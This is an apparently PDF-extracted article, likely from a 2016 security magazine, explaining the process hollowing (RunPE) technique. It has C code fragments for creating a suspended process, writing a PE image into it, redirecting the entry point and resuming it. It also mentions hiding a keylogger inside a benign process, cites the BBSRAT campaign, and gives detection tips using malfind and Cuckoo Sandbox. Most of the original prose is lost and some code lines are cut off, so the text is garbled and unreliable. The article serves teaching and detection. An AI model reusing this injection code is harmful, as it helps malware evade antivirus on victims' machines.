Process Hollowing




Dynamic Forking.- RunPE- Process Hollowing
, , ,
. ,
Process Hollowing ,
, " "
. Antivirus-

,
. .
?
- ,
. 1 l i-
- ,
. / Antivirus
. " Process hollowing
)( . notepad
, ) suspended mode-
, - (,
.
Process Hollowing
2 2016 , 77
"" ,
.
: ,
EXE 32 )
( 64 32
BaseAddresss .
subsystem ( -console)
API suspended ,
CREATE_SUSPENDED dwCreationFlags , CreateProcess
:
NULL, pStartupinfo, &process_info))
process_info handle- -primary thread ,
.
, . suspended- ,
: CreateFile
HANDLE mProc = CreateFile(argv[2], GENERIC_READ, FILE_SHARE_READ, NULL,
OPEN_EXISTING, 0, NULL);
. handle
Process Hollowing
:
DWORD nSizeOfFile = GetFileSize(mProc, NULL);
)
: VirtualAlloc , (
PVOID image = VirtualAlloc(NULL, nSizeOfFile, MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE);
. image.
:ReadFile (, )
ReadFile(mProc, image, nSizeOfFile, &read, NULL);
ReadFile handle , , buffer
(. buffer-)
:
TerminateProcess(mProc, 1);
:-header- ,
pidh = (PIMAGE_DOS_HEADER)image;
:Nt headers- offset- e_lfanew-
pinh = (PIMAGE_NT_HEADERS)((LPBYTE)image + pidh->e_lfanew);
"?context " ,
- , structure context-
context context switching ( ) , thread
. -
, thread- "
- context- - , Entry Point- EAX-
base address :
CONTEXT ctx;
. NTDLL.dll- native API context-
hThread handle -primary thread , -ctx -context .
:
NtGetContextThread(process_info.hThread, &ctx);
PEB-
PEB (Process Environment Block)- ,
. HEAP ,,BaseAddress- , ,
-PEB EBX suspended!
native API PEB- bytes 8 BaseAddress-
NtReadVirtualMemory
sizeof(PVOID), NULL);
Buffer , , handle
.
. BaseAddress- base-
Process Hollowing
5 2016 , 77

-header- , BaseAddress-
: ,
if ((DWORD)base == pinh->OptionalHeader.ImageBase)
Address: %#x\n", base);
. UNMAP
- . , ,
VirtualAllocEx: .
PVOID mem = VirtualAllocEx(process_info.hProcess, (PVOID)pinh-
>OptionalHeader.ImageBase, pinh->OptionalHeader.SizeOfImage, MEM_COMMIT |
MEM_RESERVE, PAGE_EXECUTE_READWRITE);
, BaseAddress-
. MEM_COMMIT | MEM_RESERVE-
Process Hollowing

? ! ( hollow)
.-section- -header- ,
', :
?
. section table + -header- SizeOfHeaders
: section- offset-
NtWriteVirtualMemory(process_info.hProcess, mem, image,
pinh->OptionalHeader.SizeOfHeaders, NULL);
NtWriteVirtualMemory (mem-
) )image - (
.SizeOfHeaders
. -section- , -header-
NumberOfSections- ) -section- for
"" section , ( File Header-
Process Hollowing
7 2016 , 77
section + section header- :
.
? :
for (int i = 0; i<pinh->FileHeader.NumberOfSections; i++)
{
VirtualAddress ( ) .
PointerToRawData .
SizeOfRawData .

... " " ,
Entry- EAX- ( )
Point , .
.. :.
ctx.Eax = (DWORD)((LPBYTE)mem + pinh->OptionalHeader.AddressOfEntryPoint);
: BaseAddress- ,
NtWriteVirtualMemory(process_info.hProcess, (PVOID)(ctx.Ebx + 8),
NtSetContextThread(process_info.hThread, &ctx);
Process Hollowing
NtResumeThread(process_info.hThread, NULL);
: -
VirtualFree(image, 0, MEM_RELEASE);
! - ,
... ,
Process Hollowing

", " Hello World "
. : KeyLogger
:
:Hello World- TaskManager-
:Sysinternals procexp.exe ,
... Hello World- KeyLogger-
Process Hollowing
00 2016 , 77

BBSRAT- Roaming Tiger
ssonsvr.exe , Spear Phishing- .
pnipcn.dll DLL-side loading citrix
aclmain.sdb suspended msiexec.exe Instance
.
?Process Hollowing
.
, -header- 90% -
. -"
-section- volatility plugin malfind
) PAGE_EXECUTE_READWRITE Section
malware , VirtualProtectEx
Read-only ,)Section . .
Cuckoo Sandbox API -Process Hollowing .
Process Hollowing


, .
-.
( ) ,
(Cuckoo Sandbox.)

. , 21 ,

http://journeyintoir.blogspot.co.il/2015/02/process-hollowing-meets-cuckoo-sandbox.html -
BBSRAT
http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/
http://marcoramilli.blogspot.co.il/2010/12/windows-pe-header.html